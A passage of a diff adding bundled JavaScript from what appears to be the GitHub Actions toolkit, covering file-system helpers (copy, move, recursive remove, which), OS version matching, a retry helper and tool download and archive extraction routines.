__importStar(__nccwpck_require__(7147)); +const path = __importStar(__nccwpck_require__(1017)); +_a = fs.promises +// export const {open} = 'fs' +, exports.chmod = _a.chmod, exports.copyFile = _a.copyFile, exports.lstat = _a.lstat, exports.mkdir = _a.mkdir, exports.open = _a.open, exports.readdir = _a.readdir, exports.readlink = _a.readlink, exports.rename = _a.rename, exports.rm = _a.rm, exports.rmdir = _a.rmdir, exports.stat = _a.stat, exports.symlink = _a.symlink, exports.unlink = _a.unlink; +// export const {open} = 'fs' +exports.IS_WINDOWS = process.platform === 'win32'; +// See https://github.com/nodejs/node/blob/d0153aee367422d0858105abec186da4dff0a0c5/deps/uv/include/uv/win.h#L691 +exports.UV_FS_O_EXLOCK = 0x10000000; +exports.READONLY = fs.constants.O_RDONLY; +function exists(fsPath) { + return __awaiter(this, void 0, void 0, function* () { + try { + yield exports.stat(fsPath); + } + catch (err) { + if (err.code === 'ENOENT') { + return false; + } + throw err; + } + return true; + }); +} +exports.exists = exists; +function isDirectory(fsPath, useStat = false) { + return __awaiter(this, void 0, void 0, function* () { + const stats = useStat ? yield exports.stat(fsPath) : yield exports.lstat(fsPath); + return stats.isDirectory(); + }); +} +exports.isDirectory = isDirectory; +/** + * On OSX/Linux, true if path starts with '/'. On Windows, true for paths like: + * \, \hello, \\hello\share, C:, and C:\hello (and corresponding alternate separator cases). + */ +function isRooted(p) { + p = normalizeSeparators(p); + if (!p) { + throw new Error('isRooted() parameter "p" cannot be empty'); + } + if (exports.IS_WINDOWS) { + return (p.startsWith('\\') || /^[A-Z]:/i.test(p) // e.g. \ or \hello or \\hello + ); // e.g. C: or C:\hello + } + return p.startsWith('/'); +} +exports.isRooted = isRooted; +/** + * Best effort attempt to determine whether a file exists and is executable. + * @param filePath file path to check + * @param extensions additional file extensions to try + * @return if file exists and is executable, returns the file path. otherwise empty string. + */ +function tryGetExecutablePath(filePath, extensions) { + return __awaiter(this, void 0, void 0, function* () { + let stats = undefined; + try { + // test file exists + stats = yield exports.stat(filePath); + } + catch (err) { + if (err.code !== 'ENOENT') { + // eslint-disable-next-line no-console + console.log(`Unexpected error attempting to determine if executable file exists '${filePath}': ${err}`); + } + } + if (stats && stats.isFile()) { + if (exports.IS_WINDOWS) { + // on Windows, test for valid extension + const upperExt = path.extname(filePath).toUpperCase(); + if (extensions.some(validExt => validExt.toUpperCase() === upperExt)) { + return filePath; + } + } + else { + if (isUnixExecutable(stats)) { + return filePath; + } + } + } + // try each extension + const originalFilePath = filePath; + for (const extension of extensions) { + filePath = originalFilePath + extension; + stats = undefined; + try { + stats = yield exports.stat(filePath); + } + catch (err) { + if (err.code !== 'ENOENT') { + // eslint-disable-next-line no-console + console.log(`Unexpected error attempting to determine if executable file exists '${filePath}': ${err}`); + } + } + if (stats && stats.isFile()) { + if (exports.IS_WINDOWS) { + // preserve the case of the actual file (since an extension was appended) + try { + const directory = path.dirname(filePath); + const upperName = path.basename(filePath).toUpperCase(); + for (const actualName of yield exports.readdir(directory)) { + if (upperName === actualName.toUpperCase()) { + filePath = path.join(directory, actualName); + break; + } + } + } + catch (err) { + // eslint-disable-next-line no-console + console.log(`Unexpected error attempting to determine the actual case of the file '${filePath}': ${err}`); + } + return filePath; + } + else { + if (isUnixExecutable(stats)) { + return filePath; + } + } + } + } + return ''; + }); +} +exports.tryGetExecutablePath = tryGetExecutablePath; +function normalizeSeparators(p) { + p = p || ''; + if (exports.IS_WINDOWS) { + // convert slashes on Windows + p = p.replace(/\//g, '\\'); + // remove redundant slashes + return p.replace(/\\\\+/g, '\\'); + } + // remove redundant slashes + return p.replace(/\/\/+/g, '/'); +} +// on Mac/Linux, test the execute bit +// R W X R W X R W X +// 256 128 64 32 16 8 4 2 1 +function isUnixExecutable(stats) { + return ((stats.mode & 1) > 0 || + ((stats.mode & 8) > 0 && stats.gid === process.getgid()) || + ((stats.mode & 64) > 0 && stats.uid === process.getuid())); +} +// Get the path of cmd.exe in windows +function getCmdPath() { + var _a; + return (_a = process.env['COMSPEC']) !== null && _a !== void 0 ? _a : `cmd.exe`; +} +exports.getCmdPath = getCmdPath; +//# sourceMappingURL=io-util.js.map + +/***/ }), + +/***/ 7436: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.findInPath = exports.which = exports.mkdirP = exports.rmRF = exports.mv = exports.cp = void 0; +const assert_1 = __nccwpck_require__(9491); +const path = __importStar(__nccwpck_require__(1017)); +const ioUtil = __importStar(__nccwpck_require__(1962)); +/** + * Copies a file or folder. + * Based off of shelljs - https://github.com/shelljs/shelljs/blob/9237f66c52e5daa40458f94f9565e18e8132f5a6/src/cp.js + * + * @param source source path + * @param dest destination path + * @param options optional. See CopyOptions. + */ +function cp(source, dest, options = {}) { + return __awaiter(this, void 0, void 0, function* () { + const { force, recursive, copySourceDirectory } = readCopyOptions(options); + const destStat = (yield ioUtil.exists(dest)) ? yield ioUtil.stat(dest) : null; + // Dest is an existing file, but not forcing + if (destStat && destStat.isFile() && !force) { + return; + } + // If dest is an existing directory, should copy inside. + const newDest = destStat && destStat.isDirectory() && copySourceDirectory + ? path.join(dest, path.basename(source)) + : dest; + if (!(yield ioUtil.exists(source))) { + throw new Error(`no such file or directory: ${source}`); + } + const sourceStat = yield ioUtil.stat(source); + if (sourceStat.isDirectory()) { + if (!recursive) { + throw new Error(`Failed to copy. ${source} is a directory, but tried to copy without recursive flag.`); + } + else { + yield cpDirRecursive(source, newDest, 0, force); + } + } + else { + if (path.relative(source, newDest) === '') { + // a file cannot be copied to itself + throw new Error(`'${newDest}' and '${source}' are the same file`); + } + yield copyFile(source, newDest, force); + } + }); +} +exports.cp = cp; +/** + * Moves a path. + * + * @param source source path + * @param dest destination path + * @param options optional. See MoveOptions. + */ +function mv(source, dest, options = {}) { + return __awaiter(this, void 0, void 0, function* () { + if (yield ioUtil.exists(dest)) { + let destExists = true; + if (yield ioUtil.isDirectory(dest)) { + // If dest is directory copy src into dest + dest = path.join(dest, path.basename(source)); + destExists = yield ioUtil.exists(dest); + } + if (destExists) { + if (options.force == null || options.force) { + yield rmRF(dest); + } + else { + throw new Error('Destination already exists'); + } + } + } + yield mkdirP(path.dirname(dest)); + yield ioUtil.rename(source, dest); + }); +} +exports.mv = mv; +/** + * Remove a path recursively with force + * + * @param inputPath path to remove + */ +function rmRF(inputPath) { + return __awaiter(this, void 0, void 0, function* () { + if (ioUtil.IS_WINDOWS) { + // Check for invalid characters + // https://docs.microsoft.com/en-us/windows/win32/fileio/naming-a-file + if (/[*"<>|]/.test(inputPath)) { + throw new Error('File path must not contain `*`, `"`, `<`, `>` or `|` on Windows'); + } + } + try { + // note if path does not exist, error is silent + yield ioUtil.rm(inputPath, { + force: true, + maxRetries: 3, + recursive: true, + retryDelay: 300 + }); + } + catch (err) { + throw new Error(`File was unable to be removed ${err}`); + } + }); +} +exports.rmRF = rmRF; +/** + * Make a directory. Creates the full path with folders in between + * Will throw if it fails + * + * @param fsPath path to create + * @returns Promise + */ +function mkdirP(fsPath) { + return __awaiter(this, void 0, void 0, function* () { + assert_1.ok(fsPath, 'a path argument must be provided'); + yield ioUtil.mkdir(fsPath, { recursive: true }); + }); +} +exports.mkdirP = mkdirP; +/** + * Returns path of a tool had the tool actually been invoked. Resolves via paths. + * If you check and the tool does not exist, it will throw. + * + * @param tool name of the tool + * @param check whether to check if tool exists + * @returns Promise path to tool + */ +function which(tool, check) { + return __awaiter(this, void 0, void 0, function* () { + if (!tool) { + throw new Error("parameter 'tool' is required"); + } + // recursive when check=true + if (check) { + const result = yield which(tool, false); + if (!result) { + if (ioUtil.IS_WINDOWS) { + throw new Error(`Unable to locate executable file: ${tool}. Please verify either the file path exists or the file can be found within a directory specified by the PATH environment variable. Also verify the file has a valid extension for an executable file.`); + } + else { + throw new Error(`Unable to locate executable file: ${tool}. Please verify either the file path exists or the file can be found within a directory specified by the PATH environment variable. Also check the file mode to verify the file is executable.`); + } + } + return result; + } + const matches = yield findInPath(tool); + if (matches && matches.length > 0) { + return matches[0]; + } + return ''; + }); +} +exports.which = which; +/** + * Returns a list of all occurrences of the given tool on the system path. + * + * @returns Promise the paths of the tool + */ +function findInPath(tool) { + return __awaiter(this, void 0, void 0, function* () { + if (!tool) { + throw new Error("parameter 'tool' is required"); + } + // build the list of extensions to try + const extensions = []; + if (ioUtil.IS_WINDOWS && process.env['PATHEXT']) { + for (const extension of process.env['PATHEXT'].split(path.delimiter)) { + if (extension) { + extensions.push(extension); + } + } + } + // if it's rooted, return it if exists. otherwise return empty. + if (ioUtil.isRooted(tool)) { + const filePath = yield ioUtil.tryGetExecutablePath(tool, extensions); + if (filePath) { + return [filePath]; + } + return []; + } + // if any path separators, return empty + if (tool.includes(path.sep)) { + return []; + } + // build the list of directories + // + // Note, technically "where" checks the current directory on Windows. From a toolkit perspective, + // it feels like we should not do this. Checking the current directory seems like more of a use + // case of a shell, and the which() function exposed by the toolkit should strive for consistency + // across platforms. + const directories = []; + if (process.env.PATH) { + for (const p of process.env.PATH.split(path.delimiter)) { + if (p) { + directories.push(p); + } + } + } + // find all matches + const matches = []; + for (const directory of directories) { + const filePath = yield ioUtil.tryGetExecutablePath(path.join(directory, tool), extensions); + if (filePath) { + matches.push(filePath); + } + } + return matches; + }); +} +exports.findInPath = findInPath; +function readCopyOptions(options) { + const force = options.force == null ? true : options.force; + const recursive = Boolean(options.recursive); + const copySourceDirectory = options.copySourceDirectory == null + ? true + : Boolean(options.copySourceDirectory); + return { force, recursive, copySourceDirectory }; +} +function cpDirRecursive(sourceDir, destDir, currentDepth, force) { + return __awaiter(this, void 0, void 0, function* () { + // Ensure there is not a run away recursive copy + if (currentDepth >= 255) + return; + currentDepth++; + yield mkdirP(destDir); + const files = yield ioUtil.readdir(sourceDir); + for (const fileName of files) { + const srcFile = `${sourceDir}/${fileName}`; + const destFile = `${destDir}/${fileName}`; + const srcFileStat = yield ioUtil.lstat(srcFile); + if (srcFileStat.isDirectory()) { + // Recurse + yield cpDirRecursive(srcFile, destFile, currentDepth, force); + } + else { + yield copyFile(srcFile, destFile, force); + } + } + // Change the mode for the newly created directory + yield ioUtil.chmod(destDir, (yield ioUtil.stat(sourceDir)).mode); + }); +} +// Buffered file copy +function copyFile(srcFile, destFile, force) { + return __awaiter(this, void 0, void 0, function* () { + if ((yield ioUtil.lstat(srcFile)).isSymbolicLink()) { + // unlink/re-link it + try { + yield ioUtil.lstat(destFile); + yield ioUtil.unlink(destFile); + } + catch (e) { + // Try to override file permission + if (e.code === 'EPERM') { + yield ioUtil.chmod(destFile, '0666'); + yield ioUtil.unlink(destFile); + } + // other errors = it doesn't exist, no work to do + } + // Copy over symlink + const symlinkFull = yield ioUtil.readlink(srcFile); + yield ioUtil.symlink(symlinkFull, destFile, ioUtil.IS_WINDOWS ? 'junction' : null); + } + else if (!(yield ioUtil.exists(destFile)) || force) { + yield ioUtil.copyFile(srcFile, destFile); + } + }); +} +//# sourceMappingURL=io.js.map + +/***/ }), + +/***/ 2473: +/***/ (function(module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports._readLinuxVersionFile = exports._getOsVersion = exports._findMatch = void 0; +const semver = __importStar(__nccwpck_require__(5911)); +const core_1 = __nccwpck_require__(2186); +// needs to be require for core node modules to be mocked +/* eslint @typescript-eslint/no-require-imports: 0 */ +const os = __nccwpck_require__(2037); +const cp = __nccwpck_require__(2081); +const fs = __nccwpck_require__(7147); +function _findMatch(versionSpec, stable, candidates, archFilter) { + return __awaiter(this, void 0, void 0, function* () { + const platFilter = os.platform(); + let result; + let match; + let file; + for (const candidate of candidates) { + const version = candidate.version; + core_1.debug(`check ${version} satisfies ${versionSpec}`); + if (semver.satisfies(version, versionSpec) && + (!stable || candidate.stable === stable)) { + file = candidate.files.find(item => { + core_1.debug(`${item.arch}===${archFilter} && ${item.platform}===${platFilter}`); + let chk = item.arch === archFilter && item.platform === platFilter; + if (chk && item.platform_version) { + const osVersion = module.exports._getOsVersion(); + if (osVersion === item.platform_version) { + chk = true; + } + else { + chk = semver.satisfies(osVersion, item.platform_version); + } + } + return chk; + }); + if (file) { + core_1.debug(`matched ${candidate.version}`); + match = candidate; + break; + } + } + } + if (match && file) { + // clone since we're mutating the file list to be only the file that matches + result = Object.assign({}, match); + result.files = [file]; + } + return result; + }); +} +exports._findMatch = _findMatch; +function _getOsVersion() { + // TODO: add windows and other linux, arm variants + // right now filtering on version is only an ubuntu and macos scenario for tools we build for hosted (python) + const plat = os.platform(); + let version = ''; + if (plat === 'darwin') { + version = cp.execSync('sw_vers -productVersion').toString(); + } + else if (plat === 'linux') { + // lsb_release process not in some containers, readfile + // Run cat /etc/lsb-release + // DISTRIB_ID=Ubuntu + // DISTRIB_RELEASE=18.04 + // DISTRIB_CODENAME=bionic + // DISTRIB_DESCRIPTION="Ubuntu 18.04.4 LTS" + const lsbContents = module.exports._readLinuxVersionFile(); + if (lsbContents) { + const lines = lsbContents.split('\n'); + for (const line of lines) { + const parts = line.split('='); + if (parts.length === 2 && + (parts[0].trim() === 'VERSION_ID' || + parts[0].trim() === 'DISTRIB_RELEASE')) { + version = parts[1] + .trim() + .replace(/^"/, '') + .replace(/"$/, ''); + break; + } + } + } + } + return version; +} +exports._getOsVersion = _getOsVersion; +function _readLinuxVersionFile() { + const lsbReleaseFile = '/etc/lsb-release'; + const osReleaseFile = '/etc/os-release'; + let contents = ''; + if (fs.existsSync(lsbReleaseFile)) { + contents = fs.readFileSync(lsbReleaseFile).toString(); + } + else if (fs.existsSync(osReleaseFile)) { + contents = fs.readFileSync(osReleaseFile).toString(); + } + return contents; +} +exports._readLinuxVersionFile = _readLinuxVersionFile; +//# sourceMappingURL=manifest.js.map + +/***/ }), + +/***/ 8279: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.RetryHelper = void 0; +const core = __importStar(__nccwpck_require__(2186)); +/** + * Internal class for retries + */ +class RetryHelper { + constructor(maxAttempts, minSeconds, maxSeconds) { + if (maxAttempts < 1) { + throw new Error('max attempts should be greater than or equal to 1'); + } + this.maxAttempts = maxAttempts; + this.minSeconds = Math.floor(minSeconds); + this.maxSeconds = Math.floor(maxSeconds); + if (this.minSeconds > this.maxSeconds) { + throw new Error('min seconds should be less than or equal to max seconds'); + } + } + execute(action, isRetryable) { + return __awaiter(this, void 0, void 0, function* () { + let attempt = 1; + while (attempt < this.maxAttempts) { + // Try + try { + return yield action(); + } + catch (err) { + if (isRetryable && !isRetryable(err)) { + throw err; + } + core.info(err.message); + } + // Sleep + const seconds = this.getSleepAmount(); + core.info(`Waiting ${seconds} seconds before trying again`); + yield this.sleep(seconds); + attempt++; + } + // Last attempt + return yield action(); + }); + } + getSleepAmount() { + return (Math.floor(Math.random() * (this.maxSeconds - this.minSeconds + 1)) + + this.minSeconds); + } + sleep(seconds) { + return __awaiter(this, void 0, void 0, function* () { + return new Promise(resolve => setTimeout(resolve, seconds * 1000)); + }); + } +} +exports.RetryHelper = RetryHelper; +//# sourceMappingURL=retry-helper.js.map + +/***/ }), + +/***/ 7784: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +var __importDefault = (this && this.__importDefault) || function (mod) { + return (mod && mod.__esModule) ? mod : { "default": mod }; +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.evaluateVersions = exports.isExplicitVersion = exports.findFromManifest = exports.getManifestFromRepo = exports.findAllVersions = exports.find = exports.cacheFile = exports.cacheDir = exports.extractZip = exports.extractXar = exports.extractTar = exports.extract7z = exports.downloadTool = exports.HTTPError = void 0; +const core = __importStar(__nccwpck_require__(2186)); +const io = __importStar(__nccwpck_require__(7436)); +const fs = __importStar(__nccwpck_require__(7147)); +const mm = __importStar(__nccwpck_require__(2473)); +const os = __importStar(__nccwpck_require__(2037)); +const path = __importStar(__nccwpck_require__(1017)); +const httpm = __importStar(__nccwpck_require__(6255)); +const semver = __importStar(__nccwpck_require__(5911)); +const stream = __importStar(__nccwpck_require__(2781)); +const util = __importStar(__nccwpck_require__(3837)); +const assert_1 = __nccwpck_require__(9491); +const v4_1 = __importDefault(__nccwpck_require__(7468)); +const exec_1 = __nccwpck_require__(1514); +const retry_helper_1 = __nccwpck_require__(8279); +class HTTPError extends Error { + constructor(httpStatusCode) { + super(`Unexpected HTTP response: ${httpStatusCode}`); + this.httpStatusCode = httpStatusCode; + Object.setPrototypeOf(this, new.target.prototype); + } +} +exports.HTTPError = HTTPError; +const IS_WINDOWS = process.platform === 'win32'; +const IS_MAC = process.platform === 'darwin'; +const userAgent = 'actions/tool-cache'; +/** + * Download a tool from an url and stream it into a file + * + * @param url url of tool to download + * @param dest path to download tool + * @param auth authorization header + * @param headers other headers + * @returns path to downloaded tool + */ +function downloadTool(url, dest, auth, headers) { + return __awaiter(this, void 0, void 0, function* () { + dest = dest || path.join(_getTempDirectory(), v4_1.default()); + yield io.mkdirP(path.dirname(dest)); + core.debug(`Downloading ${url}`); + core.debug(`Destination ${dest}`); + const maxAttempts = 3; + const minSeconds = _getGlobal('TEST_DOWNLOAD_TOOL_RETRY_MIN_SECONDS', 10); + const maxSeconds = _getGlobal('TEST_DOWNLOAD_TOOL_RETRY_MAX_SECONDS', 20); + const retryHelper = new retry_helper_1.RetryHelper(maxAttempts, minSeconds, maxSeconds); + return yield retryHelper.execute(() => __awaiter(this, void 0, void 0, function* () { + return yield downloadToolAttempt(url, dest || '', auth, headers); + }), (err) => { + if (err instanceof HTTPError && err.httpStatusCode) { + // Don't retry anything less than 500, except 408 Request Timeout and 429 Too Many Requests + if (err.httpStatusCode < 500 && + err.httpStatusCode !== 408 && + err.httpStatusCode !== 429) { + return false; + } + } + // Otherwise retry + return true; + }); + }); +} +exports.downloadTool = downloadTool; +function downloadToolAttempt(url, dest, auth, headers) { + return __awaiter(this, void 0, void 0, function* () { + if (fs.existsSync(dest)) { + throw new Error(`Destination file path ${dest} already exists`); + } + // Get the response headers + const http = new httpm.HttpClient(userAgent, [], { + allowRetries: false + }); + if (auth) { + core.debug('set auth'); + if (headers === undefined) { + headers = {}; + } + headers.authorization = auth; + } + const response = yield http.get(url, headers); + if (response.message.statusCode !== 200) { + const err = new HTTPError(response.message.statusCode); + core.debug(`Failed to download from "${url}". Code(${response.message.statusCode}) Message(${response.message.statusMessage})`); + throw err; + } + // Download the response body + const pipeline = util.promisify(stream.pipeline); + const responseMessageFactory = _getGlobal('TEST_DOWNLOAD_TOOL_RESPONSE_MESSAGE_FACTORY', () => response.message); + const readStream = responseMessageFactory(); + let succeeded = false; + try { + yield pipeline(readStream, fs.createWriteStream(dest)); + core.debug('download complete'); + succeeded = true; + return dest; + } + finally { + // Error, delete dest before retry + if (!succeeded) { + core.debug('download failed'); + try { + yield io.rmRF(dest); + } + catch (err) { + core.debug(`Failed to delete '${dest}'. ${err.message}`); + } + } + } + }); +} +/** + * Extract a .7z file + * + * @param file path to the .7z file + * @param dest destination directory. Optional. + * @param _7zPath path to 7zr.exe. Optional, for long path support. Most .7z archives do not have this + * problem. If your .7z archive contains very long paths, you can pass the path to 7zr.exe which will + * gracefully handle long paths. By default 7zdec.exe is used because it is a very small program and is + * bundled with the tool lib. However it does not support long paths. 7zr.exe is the reduced command line + * interface, it is smaller than the full command line interface, and it does support long paths. At the + * time of this writing, it is freely available from the LZMA SDK that is available on the 7zip website. + * Be sure to check the current license agreement. If 7zr.exe is bundled with your action, then the path + * to 7zr.exe can be pass to this function. + * @returns path to the destination directory + */ +function extract7z(file, dest, _7zPath) { + return __awaiter(this, void 0, void 0, function* () { + assert_1.ok(IS_WINDOWS, 'extract7z() not supported on current OS'); + assert_1.ok(file, 'parameter "file" is required'); + dest = yield _createExtractFolder(dest); + const originalCwd = process.cwd(); + process.chdir(dest); + if (_7zPath) { + try { + const logLevel = core.isDebug() ? '-bb1' : '-bb0'; + const args = [ + 'x', + logLevel, + '-bd', + '-sccUTF-8', + file + ]; + const options = { + silent: true + }; + yield exec_1.exec(`"${_7zPath}"`, args, options); + } + finally { + process.chdir(originalCwd); + } + } + else { + const escapedScript = path + .join(__dirname, '..', 'scripts', 'Invoke-7zdec.ps1') + .replace(/'/g, "''") + .replace(/"|\n|\r/g, ''); // double-up single quotes, remove double quotes and newlines + const escapedFile = file.replace(/'/g, "''").replace(/"|\n|\r/g, ''); + const escapedTarget = dest.replace(/'/g, "''").replace(/"|\n|\r/g, ''); + const command = `& '${escapedScript}' -Source '${escapedFile}' -Target '${escapedTarget}'`; + const args = [ + '-NoLogo', + '-Sta', + '-NoProfile', + '-NonInteractive', + '-ExecutionPolicy', + 'Unrestricted', + '-Command', + command + ]; + const options = { + silent: true + }; + try { + const powershellPath = yield io.which('powershell', true); + yield exec_1.exec(`"${powershellPath}"`, args, options); + } + finally { + process.chdir(originalCwd); + } + } + return dest; + }); +} +exports.extract7z = extract7z; +/** + * Extract a compressed tar archive + * + * @param file path to the tar + * @param dest destination directory. Optional. + * @param flags flags for the tar command to use for extraction. Defaults to 'xz' (extracting gzipped tars). Optional. + * @returns path to the destination directory + */ +function extractTar(file, dest, flags = 'xz') { + return __awaiter(this, void 0, void 0, function* () { + if (!file) { + throw new Error("parameter 'file' is required"); + } + // Create dest + dest = yield _createExtractFolder(dest); + // Determine whether GNU tar + core.debug('Checking tar --version'); + let versionOutput = ''; + yield exec_1.exec('tar --version', [], { + ignoreReturnCode: true, + silent: true, + listeners: { + stdout: (data) => (versionOutput += data.toString()), + stderr: (data) => (versionOutput += data.toString()) + } + }); + core.debug(versionOutput.trim()); + const isGnuTar = versionOutput.toUpperCase().includes('GNU TAR'); + // Initialize args + let args; + if (flags instanceof Array) { + args = flags; + } + else { + args = [flags]; + } + if (core.isDebug() && !flags.includes('v')) { + args.push('-v'); + } + let destArg = dest; + let fileArg = file; + if (IS_WINDOWS && isGnuTar) { + args.push('--force-local'); + destArg = dest.replace(/\\/g, '/'); + // Technically only the dest needs to have `/` but for aesthetic consistency + // convert slashes in the file arg too. + fileArg = file.replace(/\\/g, '/'); + } + if (isGnuTar) { + // Suppress warnings when using GNU tar to extract archives created by BSD tar + args.push('--warning=no-unknown-keyword'); + args.push('--overwrite'); + } + args.push('-C', destArg, '-f', fileArg); + yield exec_1.exec(`tar`, args); + return dest; + }); +} +exports.extractTar = extractTar; +/** + * Extract a xar compatible archive + * + * @param file path to the archive + * @param dest destination directory. Optional. + * @param flags flags for the xar. Optional. + * @returns path to the destination directory + */ +function extractXar(file, dest, flags = []) { + return __awaiter(this, void 0, void 0, function* () { + assert_1.ok(IS_MAC, 'extractXar() not supported on current OS'); + assert_1.ok(file, 'parameter "file" is required'); + dest = yield _createExtractFolder(dest); + let args; + if (flags instanceof Array) { + args = flags; + } + else { + args = [flags]; + } + args.push('-x', '-C', dest, '-f', file); + if (core.isDebug()) { + args.push('-v'); + } + const xarPath = yield io.which('xar', true); + yield exec_1.exec(`"${xarPath}"`, _unique(args)); + return dest; + }); +} +exports.extractXar = extractXar; +/** + * Extract a zip + * + * @param file path to the zip + * @param dest destination directory. Optional. + * @returns path to the destination directory + */ +function extractZip(file, dest) { + return __awaiter(this, void 0, void 0, function* () { + if (!file) { + throw new Error("parameter 'file' is required"); + } + dest = yield _createExtractFolder(dest); + if (IS_WINDOWS) { + yield extractZipWin(file, dest); + } + else { + yield extractZipNix(file, dest); + } + return dest; + }); +} +exports.extractZip = extractZip; +function extractZipWin(file, dest) { + return __awaiter(this, void 0, void 0, function* () { + // build the powershell command + const escapedFile = file.replace(/'/g, "''").replace(/"|\n|\r/g, ''); // double-up single quotes, remove double quotes and newlines + const escapedDest = dest.replace(/'/g, "''").replace(/"|\n|\r/g, ''); + const pwshPath = yield io.which('pwsh', false); + //To match the file overwrite behavior on nix systems, we use the overwrite = true flag for ExtractToDirectory + //and the -Force flag for Expand-Archive as a fallback + if (pwshPath) { + //attempt to use pwsh with ExtractToDirectory, if this fails attempt Expand-Archive + const pwshCommand = [ + `$ErrorActionPreference = 'Stop' ;`, + `try { Add-Type -AssemblyName System.IO.Compression.ZipFile } catch { } ;`, + `try { [System.IO.Compression.ZipFile]::ExtractToDirectory('${escapedFile}', '${escapedDest}', $true) }`, + `catch { if (($_.Exception.GetType().FullName -eq 'System.Management.Automation.MethodException') -or ($_.Exception.GetType().FullName -eq 'System.Management.Automation.RuntimeException') ){ Expand-Archive -LiteralPath '${escapedFile}' -DestinationPath '${escapedDest}' -Force } else { throw $_ } } ;` + ].join(' '); + const args = [ + '-NoLogo', + '-NoProfile', + '-NonInteractive', + '-ExecutionPolicy', + 'Unrestricted', + '-Command', + pwshCommand + ]; + core.debug(`Using pwsh at path: ${pwshPath}`); + yield exec_1.exec(`"${pwshPath}"`, args); + } + else { 